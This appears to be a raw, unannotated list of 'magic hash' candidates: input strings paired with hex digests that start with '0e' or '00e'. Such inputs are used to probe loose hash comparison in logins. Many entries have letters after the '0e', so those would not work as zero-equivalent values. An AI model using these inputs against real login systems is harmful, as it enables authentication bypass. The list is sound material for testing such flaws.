hashcatEyDtfXL7Y1fY:0eb61675251110054878167276702435 hashcatZAziiYBN54kO:0e201680358094517687116416862211 hashcat9YwTSeIcoWyR:0e851016901835339471421134744975 hashcatAZpOhuyHwv3t:0e303693135179081369436042343152 hashcat9Zx5XNOP2eve:0ec20585657053397619530215202491 hashcatrPYTl27oAW1b:0e159355143480978773319290574673 hashcat2kgoOpUc4fwR:0e780230490671528824082797611528 hashcatqzuB7xm2nNQn:0e988901793080979725482127310981 hashcatHbZQPQtVmt7g:0e698941911873178020764396451394 hashcat0XOCaeslKRC4:0ea94814013347962080571286533377 hashcat7EfaPdccHp3e:0e782617342338981946949215700453 hashcatf5CHc5Ua7eX3:0e225954682674701865093997632794 hashcatC8f6fKPn1Ev4:0ed88663538611463606793395958231 hashcat084aB1jNfFm7:0e845294177040449107929325347217 hashcatCJ0ot3QsFI2Y:0e388018143362098325736722862007 hashcatIoErT0eaTtZB:0e143831420583693880410360244095 hashcatE5octd1IEPqU:0e502531011951351199856979789669 hashcatXe3bkM1Uqlem:0e231249552099511290035202639677 hashcatXegXUjnBVXO8:0e779492206807446206587041280994 hashcatdSUTh3WOcMAN:0e092714162248701627420936647293 hashcatup1DevuyLHVU:0ed12137109383219505409966141389 hashcat2kWBYCw8FFlJ:0e674473628888334961274799092940 hashcatjm0HpCn25n6m:0e375028120331856284970482466281 hashcatP67uhYoQTxfP:0ee53141249730380710998871198253 hashcatoJ5xeiCg2ud3:0e759549138673772424920544629180 hashcatmkUaub25x6wW:0ed22255971426454783711877447657 hashcathW0ZMNE7qnJg:0e205985582557613221903241492011 hashcatfbqddI1qFRB0:0e955027723194091892501346387521 hashcat62OnbSdb8RyK:0ed68392808058140781756758780626 hashcatxfZbCAy0YMgN:0e901604353287709534446331674531 hashcatqY4iTejydkPB:0e258483488531397681824616366109 hashcatyS3HgIEWpsXA:0eb62111644230936795058661270722 hashcatkqmA9CPryWYF:0ea12650160986551639200815067984 hashcatq3ff9hzTIFe3:0e282418944932992681335345024199 hashcatMi9CdKQxlGLC:0eb42133552933644906054620002148 hashcatNXeR8wweyiuB:0e031246576022555463948064271079 hashcatHdTW3tpxOeAN:0ee23945033780919292656782361353 hashcatN4tHddUIwCSR:0e241414596515959326169663249620 hashcate5oO1PIY2VWO:0e887513435583726029415354657328 hashcatdDqPeYghreF1:00e97567352332036778893575095100 hashcatNQ3srdo89TqR:0ef40558043678942678540609398277 hashcatuyRLzG5tSql8:00e01019827519222036065984234151 hashcatyrz6WebYR99I:0e054022120302530233319321186953 hashcat5PT4B8l3ZwIQ:0e844587058861955318344253198266 hashcatTZPp4mzCjfe0:00e17659033928370024824249533293 hashcat3XMezwudTKx2:0eb70056647889630536931315764399 hashcatpIxzKyPgWbBG:0e937542651226775035719001451190 hashcatH3nn92FIw33B:0e760187464228781676109867521116 hashcatf2rf5xwpMA8B:0e266063893952901864193610970143 hashcatdVW4wpsUmdm0:0e807933395867245185871023013548 hashcatmzNPluBbIkbs:0e388794081078690261059196426709 hashcatb9KqcSlp5Low:0ee63325885559970580972045531729 hashcatc0dszx7fZfwL:0e016116460861295741205884340664 hashcataICBJOELSaEs:0ef85126592610057124451082843381 hashcatX8Vg5pFW8Sry:0e775781379875375077516457565945 hashcattmaxwOgdijVL:0ee76468068080342136181454163345 hashcat7IhrKk6knf4f:0ed75884286971215365437957834074 hashcatBlSGUqgIgQXi:0ea49638074065902363782993554689 hashcatkLu7ANdIeSmi:0e748413228067967993548604059113 hashcatu3m7X8yCv6EU:0ee27341201146515481533443599211 hashcatqk1JmZeG2Cvc:0eb76841431577914691380845365507 hashcatjc8Dd2YtDBoP:0e300289233366943273554537239693 hashcattoZDICrdjJ6C:0ee09972239128093017302916655925 hashcat8lAFNNuNAeFF:0e495532206676849217596564676760 hashcatJTS2dscf6GY7:0ef21544017202086404347513132019 hashcatC1gWDL9dytnI:0ec44203125966605968551343291850 hashcatJbGJDSzaq3AY:0ed38717637142025133390691071043 hashcattCBzi1KkLOlP:0ee68042466377628948785337657469 hashcatKOmKBSvYbfSN:0e800259481444998986692038202429 hashcat2Tyc9TlLhmh1:0e243601382303568196061924271208 hashcatNjg5oupG4Ycp:0ef69572871403570460246727491278 hashcatgkmSJj0f5GUq:0ed19666356276514228255468244335 hashcatWmQNsSysgRCn:0e685755120581698649362306097838 hashcatjYXKluw9vhKV:0ea77600497707785136121330578144 hashcat8vSrCc6eOedG:0e817918331134137323631992911962 hashcatP3rxiIEPBc91:0ed82640807762699315801644733111 hashcatLC3eOC883ZtV:0e185348073727439365333761046098 hashcatTjhufeReUYYe:0ed98129985996607273213986024960 hashcatbm0eREnQCZxF:0ec73700222322343431655082663372 hashcateQw5dX6f4qP8:0e713987154830874238138279327808 hashcat1wlOOpRUc7Yh:0e415888246684184750443844793132 hashcat1K8kofe7M0Af:0e560271184837537747051070427799 hashcatUym3trDrDYNO:0e912618018433866899539537579129 hashcatfA5tK2oMZYdK:0ed70754898557082084480953314618 hashcatnaEW5FBk8KmE:0e438850351107865417946844154208 hashcatEZlJ5uGTcPF7:0ee47351147686079677852158107860 hashcatRMtPQLnDJ10B:0e888716370306615548171482114828 hashcatW0zhVr2eq9ZH:0ea83569136554111698899064298456 hashcatGpVtewdg5Tq0:0e777604989704277167922369159767 hashcatHZ6Yi4f5f49s:00e53382869322430719579279092015 hashcatjHNVT5cRiUNV:0ec24164766496970637455181191601 hashcatE8tMGTOhvCWF:0eb79196459941194828128046810207 hashcatIWS5Xa28Mw6J:0ea83703377362539933366038839843 hashcatp1ufWdJR6RdY:0ea09082933112333201804127615298 hashcatKg6bFzjZ08jd:0ea64417550773557899231026400255 hashcateo2YZXbeMq2v:0e273002667913678716748315387834 hashcatBxZwHEtfU8iZ:0eb22739852015526072140672658003 hashcatNKHvTIDGk99F:0ec95544518346185946033749369199 hashcatDAPgvlbULnaJ:0e273410821531579600535935517371 hashcateUkdmj58nDxo:0e386621109701730051415838097168 hashcatcigvVbWfzDiR:0ec72900248315696636038857570626 hashcat1R7XaMS9PUPu:0ea24503094407654351149700802245 hashcat9aAbenhIbLtG:0e355360814328263468392732105397 hashcatBxbR7va0qQ1f:0e653789367518439993109807326866 hashcat94kyj0WLhYol:00e52796185454640810041139906610 hashcatlSIcZCoUW40W:0e014319431367688404169781839026 hashcatDrY9iremPPv3:0e091482799021394722061173677644 hashcatDiBW75VTeBH9:00e22822960581750183750303218724 hashcatHn0Rswx9yBTU:0e468981304529490417967696208209 hashcatz8WHvLlu2wtf:0ea90523634052476781421925868466 hashcat0EvtMTLHdCSR:0e706721299860673414991899097010 hashcatZKGyF7rUUF35:00e06038130280740524856085607869 hashcat9hZXyLe0j9kD:0e172855289197596616327189502549 hashcat64lyluhDdENR:0e046767257151951488075068898208 hashcatrfoW4IvN0dXn:0ee81118450868799965865441465707 hashcatLUUGOHoJDO6X:0e900854523839940315629070924170 hashcatmXwDr9QoZwfM:0ee64438041854740457155517714487 hashcatoWXMxl6Mf3fQ:0e305278172985670775962822472499 hashcatGIPle9v5G5QF:0ee10118610366436301310756606932 hashcatYwjKYlMbtb5K:0eb33947843361550306995197393950 hashcatGmspS1nKAgPD:0e573794711987386459526325443323 hashcat7rhX7NenymAu:0e318599495041770813361179089207 hashcatWcWChzns7fZg:0ea91147506068860772100463049090 hashcatjvBEq6FMu55G:00e03789101033630648467878515573 hashcat8flAYPLkVgoV:0e730977793649162415827250714823 hashcatUf3eD3vyXyGv:0e305309994564214358404252530834 hashcatzoeUIjvozbbf:0e559529379658318456957029484631 hashcatder1onrAA17R:0e485103873854065577921508340074 hashcat7CPeKdEtBf65:0e667879447675393308142250681154 hashcaty8ics5v4RdO5:0eb97580266773023944246736052349 hashcatRV0SfFCaVk4Y:0e734484428207200995693146101888 hashcat9hQBC9bLBBEz:0e314514791603727898531543911164 hashcat8MqCN9NAxjnk:0e166897632792130862394352514193 hashcatLI58juDhkqrt:0e160826322958573722208882082182 hashcat1NeAejpxTDEx:0e511704724801089852062543562585 hashcatWacNvPWg9ysX:0e100584909587256939082984155094 hashcatd95otO51iGpb:0e441648116586010471810320607191 hashcatOfZLdfu9tl1K:0e262910282637347006014043020126 hashcat0l0RWwmoOWVy:0eb71510685877728407552561618551 hashcatFlqabc2MJNi8:0e258932010038344947770476449734 hashcatErAUqXRwX8pr:0eb91709428182362266335550528237 hashcatS2plHqrcqOTw:0e720392406500752382412102944560 hashcatFWWNIHwMJBTk:0e932362810908829486255181326624 hashcatN02klpGXllWy:0e958832861792399565903244316379 hashcatCnKvdkct85c9:0e047370718806375300931408867931 hashcatRxibeAnfIg9i:0e483353164922505225551649442262 hashcat5AtFCiI55fZe:0e404369887381637939599411249610 hashcatmFVN8venzUhQ:0eb57192898811944323832724404225 hashcat7LeT05qzhICT:0eb04032412845546746907276656790 hashcatcRrfOUnsb2QY:0e984443593473245938618603829085 hashcatZz4eBdTNbJJm:0e754313447197502380182941505899 hashcatKf3CP2FF0xnl:0ec72612163756301868554138806923 hashcatjfdjnwUvMMlf:0eb81466632526298574135201476822 hashcatW8bAgaAvSNnk:0e549210972114765511194892243949 hashcatvVlxb1ruE2Cy:0ef58617375360670342972353923169 hashcat00L2fbYPHF0u:00e61511983177762994316403508373 hashcatTeRyyubmdchZ:0ec46033570004310562635401279279 hashcatQm0etWMDu7Op:0e113809520933484304697738373819 hashcateO9gAAuIgbhb:0ee14173877818893005038496123922 hashcatKtfblpzfUQak:0ec84144942058595551929680540934 hashcatf0wTHlk0q4Ot:0ec42154709300515583409734840699 hashcatoaaR3nCemAjV:0e644712652854216653210649019966 hashcatsn6tpSXMVneI:0ea58458381320925504215769691502 hashcatJl8k8P2A4Txo:0eb83426034637810551630901072218 hashcatC4nSzZaiebpm:0e545164150667088447957343575697 hashcat0If9EnAlN597:00e27815530413747851470089909200 hashcat5EHt93T2B65b:0e431728043680412425931200669560 hashcatbqF3jFl6aLtV:0e842830734288661948684007981021 hashcatfvFeMPnOBIK9:0e397704243679743620267535719383 hashcatTLWYdVH1fF61:0e902622922704373625462006591084 hashcatzKwpvJwX8jWi:0e012942409057542020981383248082 hashcate2JlPycuFHVT:0eb87006337053506094213319611523 hashcatzNvnfcqTBSXR:0e037799625419873955830852813653 hashcat6qyGT2TXNvok:0ea56811321107017762417652612881 hashcatOnWUOQAtOjWY:0e713509052003864199988336870712 hashcatgHjrRuz8GhfB:0e096563009177733317125961726648 hashcataxI1LrGcYuwJ:0ef29811509351797552264521322511 hashcatoyEDeUZDZQP9:0ea44151531419465129882575101988 hashcatPRx774nFSfZb:0ef75376657907099561472568382857 hashcatzf3bXAxuKkv9:0ee55435318178210319891668116687 hashcatfasqcTb2a0FW:0ec80798186111633574791389058956 hashcatyVgxeio33XWR:0e065196279405838050523470289445 hashcatKjU2YvVIQTH0:0ea32783087431623175057052593697 hashcatx1wUohoz8qeV:0e148902311546701240194761557681 hashcatNBDp3dmrAVIZ:0ed89060614035937073911499320149 hashcat90gZs9VZ6154:0e358379830096957123832000465492 hashcatd3v5EeHde4tH:00e23921615024417905972279860127 hashcatgeLdQv0bP4KM:0ea29699394513979399281786583387 hashcati7tph6JiKBfC:0e648312676073315753686782434251 hashcat8zYMuf2O5BCk:0ef57466112854436481571102638193 hashcatTFSHysmPWneh:0e549122357245810735417426731529 hashcatRTzx2FXPa0i5:00e71106873513486386020638513253 hashcatbwxIjrWvXf6p:0eb69646765158972453824893117661 hashcatmAtAfYzsbdDK:0e798262190719244642120406241037 hashcat21MhEGqn3B3p:0ef80192089480402392528077866594 hashcatFAELeLIRA4CC:0e393063451113520623260883180370 hashcatEVe3FcErfYeB:0ee96615435496349159823339551231 hashcate2XjVFLOIoIO:0e547618050413596671736764162278 hashcatW0OwNL6kjUIR:0e927046279499001653730064212316 hashcat6CD4MTAHKoVG:0ea78956015090101871250746950800 hashcatFkPKDR62xeei:0e713327370227563478859107579016 hashcatYCw3wNdHVCgj:0e129687674524874682216836227729 hashcatne7ky5XHyoWN:0ec71693738251482072865436434410 hashcatk6elOmlfz6Cw:0ee29861466034587670322968800199 hashcatfVL37UdF8IMq:0e769621405874205975081405369220 hashcat3K7R9MhtyefO:0ed17833969152752639408004882293 hashcat1mEn9FeUPQpm:0e645268213701136739851883775787 hashcatu1uwYqofkWwH:0e273425521964189054573942996476 hashcathm9p8KbjdSRA:0e360581727854283017937813383700 hashcatoiPUbm6exRON:0e601285101878878662990909509462 hashcatSYkMWg0GmeB7:0e711517325531233007617864779135 hashcatailgY4B9d1IN:0eb45180032583543315724470131419 hashcatWkiHWfAdJxcN:0ed70237375617000663128600151212 hashcatCyX5iJSvrpLK:0e261181667495690637334948052131 hashcatqs2gmqIzYJt0:0e898390707386014860029943707671 hashcatipLQXLMO3w8i:0e498845730231345742163116324571 hashcatoBKZuNACPEMT:0ee27520974738180138660779550757 hashcatnJMjYiHnduq7:0e350221130318374996361609007007 hashcatR7GIYJj9ZDrX:0e332522052041680297987999287874 hashcatefBCW7cUfuNQ:0eb03943250209508910624676972438 hashcat4E1drHwK6hNq:0e571922878615293124985545571278 hashcatya5Lp0anhiqH:0e110920165167738495586572246492 hashcatnlpkoMq05V5c:0e452441252333108355062684174414 hashcatyrbjL6fEiNKW:0e144194516543770732795176766798 hashcatu9A8iMUlWKOe:0e180683742815794241773611247433 hashcatOAenoZfHPZfl:0e594916404570158017705011294283 hashcatRyt041om0ZnU:0ec40363075564276905867045201608 hashcatH4BTGfvvkgKF:00e02799278283881138931712860238 hashcatU9VkHPFVuVeT:0e243649086020299765539643957482 hashcatLIPq9KAfyHwn:0eb86465492236896461577632006062 hashcatruH7ixBqq6g1:0e624971635547993313711867871646 hashcatGvSrMx7PLJf5:0e997970895538822639588928108376 hashcatu6f3hmDEvRDB:0e458104215991307643920017914660 hashcatjaygInD5uJyx:0ea19744265103045010055390282215 07FEn4sP:0e818465364995012450160645503327 0vmxarB4:0e186988543371148583868090628757 2Pwkeubj:0e560020969989064619038976414043 5TACbn8q:0e443422076694146802360513332568 6owX9vXc:0e305137237314174269404155016688 78AgQHL8:0e478298083613316107459305907098 79OY8c7V:0e359187161304157539287509886370 BEuySPZ6:00e42536511573327958837976762330 FfHd0M7m:0e476654702450299632468777628354 Fmo7iEYs:0e484554157094397182863571767172 GGUZOaL5:00e58461571023902835312409167773 GTJ3YSmZ:0e803473473049474745461468508663 KTd1dW5B:0e198979323667213428501216296281 MXit2K87:0e852788235864983815562559528091 NSYJnMQH:0e195403329629357635131280129190 OxF5b8X0:0e173098816894413857288672198362 Pd4VRbrD:0e506708520150717331405863398954 Q21oc4jl:00e59768136635402005534872511270 RWwHo8GU:0e800840643855010037448881984204 RpqbhtSd:0e069966635722217754458175456433 Scsi7yFq:0e114567529312736809898655684693 TndUWGEO:0e077574071545040399080277481258 VHOKxRal:0e487980017935959146955103358106 VgH4VvsR:0e312689870610735311595882253536 YpQEENSk:0e488409725759048219123793610673 YyxzqY6a:0e819140131532955467068164761808 bl5jW6fq:0e115397152828094255399175796659 bu8uE3Fl:0e453460869789584366816848139486 cDW4xuJL:0e933875473827131465822233669180 g155P1dr:0e534079230239544746143741629773 knSWWnP0:0e140990768077153268467404324379 lM1Fp8kF:0e915357242539743090226437664036 pYNVpF5a:0e484887635913963065228367725792 qxjnlTwI:0e048020066397263986081879034441 rKARPSz2:0e096571847500387036158576110981 sSdSBgPG:0e001545189745179000556196073262 salhSYmG:00e97132148382355738347146842033 smEUAHT8:0e111217423736819813153471728528 vUU5Myur:0e401671111555918816845394123278 yLqGVDwZ:0e384442561191367756099756925488 0BjwpZN7123:0e044501587820538634551334355770 123072qNyLX:0e173225800623477077170655519507 1230NfRzHKZ:0e792989266098596293450394438569 1232GbLpCiT:0e394353348609913295717307173370 1233bSQEH0b:0e919690854618060666601691659658 1235NWUybMj:0e063403212310483769690805065825 1237AEBHuxp:0e935253073778106426297490832707 1237PLtBEM6:0e101753759710895202182204836980 1237S9Xm9BB:0e274891953092733006767445802251 123A3oi1ZCB:0e383803234852401427400835007784 123ADw2EcR1:0e705000597672583491346120009196 123C1O8E2R9:0e164272952871900958448783617716 123DWcXRL1g:0e973500807967144455964515923799 123GPvUQEqx:0e047779354437823150759237832317 123IPmVzEha:0e217965744631372178070549749674 123IjBmuIdG:0e373084776503166798762446544090 123JDLwEtbP:0e573176346147001650108196601344 123JMr2SivG:0e406815567764602409869672507526 123KVtMuCTU:0e237996220679150359357968225898 123KzvySgmq:0e878603839868072014919271987393 123L6mQOwPd:0e199927703462742018806026867248 123LwS5BmDk:0e606401498153860106097466821485 123LwppZoDh:0e865077392762807912557810462636 123OFSgPNJH:0e325195345077649192366881816781 123PAfEbg35:0e695217336543611377675056158313 123SbjqXmG3:0e063440635641896597100134021682 123T7447xTr:0e442146497422063693240361029407 123WGIwMBYU:0e143411518928264546709493531576 123XhTPiIy4:00e39291179711828302315716212311 123b8xzZEgq:0e210630296866497280290153764076 123et5qSPo6:0e578202423592283777541400439888 123gZ5IhNLF:0e382837914145424584893818619299 123gohDWb6S:0e180143324788061662560119258181 123iOJZv5Lb:0e637315644847226799941804916202 123j1gSd0cx:0e174413629803472241594737171840 123jNfNGmnY:0e341499420453300952680698630584 123jzazpwPv:0e994249981939772421753088649472 123kZ5etybC:00e64574777120986712170641764973 123lsYrWdYx:0e907730870499950745937818218354 123oksQGKRU:0e952100030203135626766403645831 123qDoLPAqs:0e312653519279611815433993148500 123rKGUQRy4:00e32503139227040467351924322965 123uSPB9TbS:0e790923800292454338835856268313 123urF1oC1i:0e783946138664317185555102512715 123v9HchgfR:0e757234114669118020779740236931 123vzlkUzCY:00e73598578914775814443247204323 123wFIdYdsd:00e40930545550624055611637512128 123z6WrrWQz:0e836825228923217598615097810945 123zJS2mw23:0e388597762908012199905358381080 123zahhTyQC:00e97669033292422039515578589244 1LFn006Q123:0e785472232372057432595300925115 2mtWoQi2123:0e543327146834766330479762636361 2to8EzXf123:0e737053257198387832139845832107 2zAHe1rdabc:0e189656022638320797038370318080 59D0hkMBabc:0e502227416694497770293038177364 8Fpj5VMB123:0e741295853435965863207597011970 9e3LZMOOabc:00e70153057673217277726511013604 9fz88QmI123:0e496211813875839888884424527615 ICWjpZq4123:0e422968855943552648298065071887 Jyh3kN7Xabc:0e198025597575623710806613358516 K08pPwHR123:0e817727734884247252571224878771 KiltBPlHabc:0e348492516167418545313808687992 NxXhPUelabc:0e036659406784394461138665096966 OzUb7aAz123:0e184853692391088898314763670081 PreenuaHabc:0e122350164991741065745632471658 Qxs2daYW123:0e556485729818849153460746667456 SusrEb62123:0e595382716541638596212874739421 VXx8wjPoabc:0e356074966114130738099348064155 abc3J860LpJ:0e080088278595668260174306546072 abc69WNZ6XU:0e081502383796886474079688943427 abc6URHWbfC:0e852655073237061438725313443714 abcAp6Sxw1j:0e821539860384670888592561134442 abcBLiA45Mg:0e047009536035947520979498297621 abcCnQ12A3t:0e477456514055784273981142480212 abcDwU8wCD4:0e272553697868389031173260451524 abcFRcgBMhS:0e323432093396194207457636088334 abcHfH1vb0V:0e798918330378786680491812688426 abcHqTbn8S7:0e626867880425541428354150784898 abcLFWKfYfa:0e115475995924665679441376301245 abcMGGfX2VU:0e326696458510992713543072556629 abcNZ5iwvWi:0e434738511829436466871993325003 abcOo4awWa1:00e10103172115901558787012182662 abcOqaTNLDD:000e1640738746380107023370801785 abcTcnhXAwM:0e493707286061122838672478136151 abcUReTP2RG:0e711669290456777213730076069115 abcUtrOl4iD:0e481000106858415583915855214612 abcazI1cWJj:0e090834278490300511041854943846 abccrR7kUKw:0e595115040769651736672578149738 abcewRZL2K4:00e69710009207015091983322333367 abcf9FjXO9h:0e583861828759999375710762386181 abcfbkwGVIM:0e124859781897479406471310274665 abciOEfIoP3:0e750143108151497517512981976595 abciULWtztj:0e015482782086224678711348946999 abcjRleKt8Y:0e790926817762745935129581933853 abcjWZY5p5I:0e386135102212088676991630350591 abckXB1z6e0:0e532111367303721385759341171639 abcnHLfXtsL:0e625034147214212151061454475933 abcr6m0TYfB:0e239700241879125442633260696870 abcraWYqf7s:0e010472279905434033680116137130 abctvRrMFEK:0e377026978787592814469455675053 abctvXqR55I:0e100231159347513269636201494646 abcwmf8Vv7V:0e917413018607119188690959522613 abcx2mMtl5v:0e246158368694453664411916183790 abczJQsLLMR:0e637664803834471932721979939621 abczVBJSUuR:0e243290500679059135881845663163 e0KyIrYv123:0e500224269544123175766985355431 hfJTGEAZ123:0e177211772494730590339712709975 iqoXekZZ123:0e438737781298657871500284163488 kVKbJsbc123:0e859245628205631785434879617996 lmLJCjcu123:00e95071710439957711401540424572 lnSZ37Sm123:0e922464428506711335483475014517 nsprPZysabc:0e341461330988275329454281437426 qJ8xFsPo123:0e515036189105890288123873478095 szOv6WxNabc:0e010526382013967594190209865063 uFcxczXN123:0e255129593297009930789193140071 xpRHlEh2123:0e464936732132913684369711837743 185108789abc:0e794171474557170256534703156406 66vlF0EMuo5k:0e085518389086878134845564489741 6d8dhWXScJlW:0e483349222849501401479573947729 8U9HKAWrsUUv:0e293700057145223332148823634539 Djst8DgPCt0y:0e773867529498181462358489286152 FACZ2TxDgCyk:0e129393501994211217408976885339 Ft9HwN0QBVQd:0e863279948237803864005992417634 KYJpq8HC7bMc:0e111920379913940272046936631348 LStnc2MAKdWe:0e782794441322544756268380726651 Lsr64tNcmLTS:0e150502868747909945772373520877 NbYRn94SKyl1:0e660660945958452603316386908123 PlaWrKGMu9yG:0e256360390695420880362675136584 Skzvax124xBb:0e105556476792017677021745158651 T0uUfK2Q8cik:0e118384241771571176356368427884 UEGAbLWdsx7C:00e51572240181368011633518322412 X5lXiPmhezin:0e466682363807826912169538795680 abc159086795:0e689047178306969035064392896674 abc881841043:0e367041900543441029563124937228 abc972586338:0e841063432530790836849441220265 bGD8jha8AlSC:0e825110131238975934097747438094 d3C4XzcYYJ0w:00e67972772076279757422607754851 guhYyTRpeNNP:0e442794795707185857719335366936 nBUfGXMDBmmV:0e741385010207011839626710019143 nJfp4BgODANP:0e326317707028499177830478236923 nOUkHUoLI7bA:0e126165465744024844602201925305 oG9gOwMNUcA9:0e102856367633866248822822538173 pqAZSHfYIwHF:0e773939104686777110859301993365 rhqc1eNRz0jz:0e400599098878084994964989437950 vlDTUqqgLrWT:0e171135099557940497066539413538 0rCCFVK5hello:0e341458689020068004009380684426 1497860116abc:0e315567585179673605046363175016 1555669152abc:0e617227714709657599517443612891 1858521587abc:00e72032532215436671549609646555 1869149637abc:0e597546911230096796627092116287 1925075138abc:0e721850619801609110843776277193 1972366815abc:0e873615697730595069141037038322 2110803526abc:0e324316378866338915127082973545 2392453052abc:0e854301621315436115803412220883 2918733273abc:0e406440220827534030793589817604 2994049757abc:0e854871064450301583802284574846 2MckHfFwhello:0e475735962696558914856140331137 3059308342abc:0e539867938634472786162363004017 3061062669abc:0e593673401700428688569077614998 3835864647abc:0e297286500374769026178954144027 3879835392abc:0e141015911386205195500441535077 4197210551abc:00e82096161841492866588321968925 4242350881abc:0e388749757863557269908950425287 44683106hello:0e345454812379965963500744131755 4485977173abc:0e432209500614354902575946950322 4496325471abc:0e604068520122076280668967858366 5123561735abc:0e192448656819689579663402632707 5XVe32K2hello:00e29248180925060615658190794077 6403253139abc:0e274197734240132194727708634185 6916220907abc:0e307167574261776673343869112344 6990389311abc:00e88956891734436705233439493533 7112481172abc:0e749867623348378807452842903266 7918079408abc:0e528897339634309832329446871491 7939510714abc:0e168206357901180846780308585276 8663425573abc:0e031729089305784425967546239820 8694784443abc:0e620972654966689357367428978261 8786373522abc:00e52107084201969352753385017214 8787384034abc:0e702565155023090652395402995100 9497974656abc:00e39786989574093743872279278460 9992473350abc:0e142081229903926924291387418884 BzRDXNrqhello:0e238872362391842421990692186350 OJS8Re3Ehello:0e874769109757180442990836153073 QKIRbLMbhello:00e82010272588913494874075404308 RQFmKSk5hello:0e264387635231842725575211994983 XcKEvES0hello:0e964562580826716411775523600875 abc1000899060:0e121736315773876437379216153500 abc1096253689:0e664068263703106696555209425934 hello0rfCmU08:0e319957400442773298145222442028 hello1P9nLQmF:00e01450501445988824413679992553 hello4qF1pkCu:00e12483932838133705829240070744 hello5ogDk6MD:0e479453688109595852600389146733 hello7OfV1pHG:0e753920993198240461046868701706 hello7hydlarz:0e653698208105792869029369585968 helloAXTKLSjy:0e052539892259114859640052326948 helloEGJ7LHhA:0e299867669496704859280595221290 helloFlizDQKS:0e402980272536959961812064024028 helloHKD57Smo:0e975856862727475742584132986413 helloJpOtpH9D:0e965085347228157259112180379575 helloLizoe53N:0e896373459033447788368107978553 helloLw6dK1z8:00e76763674700997023615024879315 helloP2unEU1n:0e118275813739795161784520429617 helloPxB4NDuq:0e352565914574512443937170933788 helloPxUddnxJ:0e679105871843092848109265753035 helloRJJnvpME:0e580448060181188043731880856446 helloRmYCTqw6:00e10968728013776640746800840027 helloUhTF2e4h:0e268518755764338261571769908809 helloUly4sKBs:0e526486202088319141488400778427 helloVuiBExvK:0e436093185083812127040988867475 helloWSiZDEfW:0e554813064909321828168289872681 helloXgqTs8Op:0e191967979148142784996325267262 helloXmJ3ufLh:0e297466430087253241368454655530 helloZ5P8pk6Z:0e717192987842357999753403214061 helloZgD8J3Bw:0e026983578289751346449857742272 helloaVCkS08p:0e223022993580417076841375850831 helloegFJ0gYn:0e032971758778418406046710861610 hellogq91zohK:0e949797348142529148887313794172 hellohkSDsiBt:0e490789392110768776457566243917 helloifD4idJC:0e558712719905214121428535658378 hellokzgpmo2A:0e678871401406640475038587528731 hellolfzdsyi1:0e748553266280500105897104531211 hellonKghnsPr:0e828802065793295860193266417698 hellonl3JoeU0:0e613998338890675336630148293630 hellos96nNAVa:0e072409899066486174131879789375 hellosoIDoHGR:0e936557256102168927751466170611 hellowLsy3XyM:0e024084237222475104399134779541 iTnEeQohhello:0e332147125486889608048401650413 jEYhN8lOhello:0e710095326463708330672374397326 10256107981abc:0e243400796157423113837283456259 10960244440abc:0e305228459314263578047228594216 11179447938abc:0e344947368902513318408474762864 11187657333abc:0e813254788477647633410452292882 11212753328abc:0e716441424049958126278352256805 11335162782abc:0e547122947481666997769759318604 11523729071abc:0e996508862987600198783055599419 11617939534abc:0e036326027321699501765392445095 11847635841abc:0e380955964361784173465938928024 12265498497abc:0e653721635812112812812943623172 12565596238abc:00e78898863364769859211405104852 13322874988abc:0e367008298083134506419670376044 14348277284abc:0e319109816075038370127689322166 15114095783abc:0e822765396463167654528278341080 15274915014abc:0e783012424459667950083283305224 15523483144abc:0e602791960841971081465365543947 15576098787abc:0e926479031443037930816674394927 15604861828abc:0e801531486059204958654274572109 15850912158abc:0e866267011289417336160709880563 15912287060abc:0e270247480077585773093806255125 16128310943abc:0e251010699814609150059298651594 16314514162abc:0e416048116282294014364090478654 16437803022abc:0e594560521824817396348847883910 16870216256abc:0e173598035202747038169248653523 17074741781abc:0e335687398786074028235756402225 17216657328abc:00e35645438288769028980653614371 17325314577abc:0e139929756865576003496761656047 17571820460abc:0e335940897938838066367666920873 17947506058abc:0e984416266680031628239129598447 18796055860abc:0e624809536100340000649884841662 19628732327abc:00e48483801626536886347891518295 19685357846abc:0e142057241090737466770311436274 19962466137abc:0e819328685132355422690115557937 20516315088abc:0e872776281290784237889512792394 20684325385abc:0e812224828968442284187448348970 20799929446abc:00e03480391551416341892874480253 20808114424abc:00e01946411671129357374659098822 21053117211abc:0e250657216501310985890434036026 21443502060abc:0e748063611935621125290495444799 21531438378abc:0e467342769655470642006025754832 217999313hello:0e968735484193757088984128223538 22222841574abc:0e800949314210590494919317196064 22224638037abc:0e146187037451850830854514821767 22733415200abc:0e405037745415128364073979856919 23399766546abc:0e362100417416497135530402824062 23805815416abc:0e501008269688937896791823094306 23826875820abc:0e362942997354612711163833810165 24045130882abc:0e309859395651912513750295045593 851540766hello:0e712601847221119538423559709183 hello260459558:0e862144521087604521816107302382 hello378097667:0e671699021444073100367671932950 hello462341138:0e826555004251931137227058696270 hello565119246:00e51326069452846241211055882721 hello804392111:0e177337912171954059272958030021 1182124884hello:0e743085805252927775565385290397 1219528398hello:0e868489106034723523559320341834 1365961680hello:0e668883720723418111245548953214 1437570351hello:0e206240563971050550116633301219 1545366180hello:0e257204273001610237815292534804 1913398263hello:0e500122072987105499558769309919 2082832014hello:0e641531560203654077289258748768 2110419268hello:0e762171063695462807358759123750 2555322872hello:0e112021453091938008179926214432 2703428329hello:0e539034975375694709628091119285 3112336944hello:00e84318121438045061107416117877 3628930742hello:0e151552396662602699790731012016 3631323377hello:0e931363893282159188068848944511 4037048254hello:0e967077438787013328807625996622 4191516815hello:0e825371282614850860463388078467 4489161974hello:0e558707314409339998121484069293 4587231365hello:0e504446921245543672741298606269 4675405977hello:0e212362508980563187307380624574 5306434168hello:0e233977016726735249825850112191 5386712952hello:0e979094825139201743271623118497 5475907700hello:0e320113725965349531245264287508 5687931703hello:00e24990249063715603043847588412 6221420259hello:0e427088803668170868968681882372 6289610963hello:0e798422082256872983511618278639 6619082729hello:0e632129769104845720449638434365 6978760807hello:0e277822600679140301163408072337 6998768449hello:000e8035366967428111420789887452 7257714879hello:0e145836254131914671762702802248 7516045380hello:0e794296267645314378837157280716 8007474935hello:0e797660940305640059960923840530 8085405950hello:0e919749841593600480396602490551 8484894580hello:0e386534009257600539447714376960 8713342948hello:0e299007796530052469172589577557 8979944845hello:0e874413536934946580761991223533 9096228048hello:00e55480549742593479712918207437 9295326389hello:0e745300758703252891987480809406 9300271123hello:0e608352080747646815330536960302 9541321678hello:0e847259933883272237056784406542 9549528299hello:0e026724414718028157133240637643 hello1835612665:0e695502374759494568304076914962 hello1975889545:0e397431486738711936984824494127 hello2122258678:0e355754319526429296453963428621 hello2360199793:0e723640171579308600048103169197 hello2446924064:0e724243036529668902792507562841 